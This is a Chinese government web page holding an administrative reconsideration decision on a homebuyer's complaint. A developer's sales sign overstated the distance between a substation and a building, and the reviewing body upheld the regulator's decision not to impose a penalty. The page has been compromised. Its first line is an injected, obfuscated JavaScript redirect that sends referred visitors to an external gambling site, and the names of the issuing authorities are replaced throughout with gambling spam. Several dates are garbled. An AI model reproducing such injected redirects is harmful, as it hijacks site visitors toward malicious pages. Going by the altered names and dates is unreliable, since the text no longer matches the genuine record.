var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

bbin宝盈,bbin下载

您的当前位置:首页 > 行政复议
发布日期:2019-10-30 浏览次数: 字号:[ ]

申请人:吴某

被申请人:bbin宝盈,bbin下载:市场监督管理局

 

申请人吴某不服被申请人bbin宝盈,bbin下载:市场监督管理局作出的《关于投诉举报问题的回复》,于201914日向本机关申请复议,请求重新作出答复。本机关受理后依法进行了审查,现已审理终结。

申请人吴某述称:一、阳光公示牌和业主告知书起到告知、提醒的作用。在《商品房买卖合同》中未写明变电所1#和1#楼间的距离,故阳光公示牌和业主告知书应当作为《商品房买卖合同》的一部分。二、bbin宝盈,bbin下载:市场监督管理局作出的投诉举报回复认定属于工作人员的失误,未进行充分的调查取证。三、变电所1#与1#楼的间距是吴某选择1#楼201室的关键因素,bbin宝盈,bbin下载:市场监督管理局认为嘉兴某地产开发有限公司性质轻微,且及时纠正证据不足。

被申请人bbin宝盈,bbin下载:市场监督管理局辩称:一、bbin宝盈,bbin下载:市场监督管理局在接到吴某投诉举报以后,于2018119日赴嘉兴某地产开发有限公司的绿城柳岸和风楼盘售楼处进行检查,未发现有标识“变电所1#与1#楼距离约18”的“阳光公示”牌。并于同月22日,赴嘉兴某地产开发有限公司向相关当事人进行询问,并提取了嘉兴某地产开发有限公司工程部说明等相关证据材料。同年1212日,bbin宝盈,bbin下载:市场监督管理局向嘉兴某广告传媒有限公司相关人员进行询问,并提取了委托协议书、工作单、情况说明和对员工的处罚决定书等证据材料。经查,因嘉兴某广告传媒有限公司员工失误,将绿城柳岸和风楼盘的“阳光公示”牌和业主告知书中“变电所1#与1#楼距离约9.4”做成了“变电所1#与1#楼距离约18”。20189月,嘉兴某地产开发有限公司在接到业主反映的该“阳光公示”牌制作存在失误情况后,已及时予以了销毁。嘉兴某地产开发有限公司也表示,如吴某因对实际距离不满的,愿意办理全额退房手续。故bbin宝盈,bbin下载:市场监督管理局认为嘉兴某地产开发有限公司“变电所1#与11#楼约18”的描述,非主观故意,而是由于嘉兴某广告传媒有限公司员工的失误造成,性质轻微且及时纠正,符合《中华人民共和国行政处罚法》第二十七条第二款的规定,对吴某的投诉举报回复,事实清楚、证据确凿。二、吴某认为应将“阳光公示”写入《商品房买卖合同》,不属于bbin宝盈,bbin下载:市场监督管理局的职权范围。

本机关查明:20177月,嘉兴某广告传媒有限公司嘉兴某地产开发有限公司委托,设计绿城柳岸禾风项目阳光公示件。工作单载明:变电所1#位于1#楼东侧,与1#楼距离约9.4米,建筑总高度约5.4米。绿城柳岸禾风阳光公示件,载明:变电所1#位于1#楼东侧,与1#楼距离约18米,建筑总高度约5.4米。201712月,嘉兴某广告传媒有限公司对工作人员因在嘉兴绿城柳岸禾风阳光公示制作过程中的失误给予处罚。20181030日,吴某向bbin宝盈,bbin下载:市场监督管理局投诉举报,嘉兴某地产开发有限公司在绿城柳岸禾风楼盘售楼处摆放的“阳光公示”牌上的表述:“变电所1#位于1#楼东侧,与1#楼距离约9.4米,建筑总高度约5.4米。绿城柳岸禾风阳光公示件,载明:变电所1#位于1#楼东侧,与1#楼距离约18米,建筑总高度约5.4”涉嫌虚假,变电所1#和1#楼东侧的实际距离为9.4米。bbin宝盈,bbin下载:市场监督管理局于同日立案。2018119日,bbin宝盈,bbin下载:市场监督管理局经现场检查,未发现涉案“阳光公示”牌。同月22日,赴嘉兴某地产开发有限公司向相关当事人进行询问,并提取了嘉兴某地产开发有限公司工程部说明等相关证据材料。同年1212日,bbin宝盈,bbin下载:市场监督管理局向嘉兴某广告传媒有限公司相关人员进行询问,并提取了委托协议书、工作单、情况说明和对员工的处罚决定书等证据材料。经查,bbin宝盈,bbin下载:市场监督管理局认为嘉兴某地产开发有限公司“变电所1#与1#楼距离约18”的描述并非主观故意,而是由嘉兴某广告传媒有限公司员工的失误造成,因而行为性质轻微且及时进行了纠正,依据《中华人民共和国行政处罚法》第二十七条第二款的规定,决定对嘉兴某地产开发有限公司不予行政处罚。bbin宝盈,bbin下载:市场监督管理局20181220日作出《关于投诉举报问题的回复》,并于20181239日送达吴某吴某对该回复不服,引发本案争议。

另查明,涉案变电所1#与1#楼实际距离为9.4米。

以上事实有《绿城柳岸禾风广告物料委托发布合同》《工作单》《处罚书》《立案审批表》《关于投诉举报问题的回复》、询问笔录、照片等证据为证。

本机关认为,《中华人民共和国行政处罚法》第二十七条第二款的规定:违法行为轻微并及时纠正,没有造成危害后果的,不予行政处罚。”本案中,嘉兴某广告传媒有限公司嘉兴某地产开发有限公司签订的《绿城柳岸禾风广告物料委托发布合同》工作单中明确载明,涉案变电所1#与1#楼的距离为9.4米。相关证据材料也证实,变电所1#与1#楼距离约18”的描述系由于嘉兴某广告传媒有限公司员工的失误造成。且bbin宝盈,bbin下载:市场监督管理局经现场检查,也未发现涉案“阳光公示”牌。故bbin宝盈,bbin下载:市场监督管理局认定嘉兴某地产开发有限公司违法行为轻微并及时纠正,没有造成危害后果,并无不当。因此,bbin宝盈,bbin下载:市场监督管理局对嘉兴某地产开发有限公司的违法行为不予行政处罚于法有据。另,吴某提出应将“阳光公示”写入《商品房买卖合同》,并不属于bbin宝盈,bbin下载:市场监督管理局的职权范围。

根据《中华人民共和国行政复议法》第二十八条第一款第(一)项之规定,决定如下:

维持被申请人bbin宝盈,bbin下载:市场监督管理局作出的《关于投诉举报问题的回复》。

申请人吴某如不服本复议决定,可在收到本决定书之日起十五日内向人民法院起诉。

 

 

 

bbin宝盈,bbin下载:人民政府

                                  201933





打印本页 关闭窗口
Produced By 大汉网络 大汉版通发布系统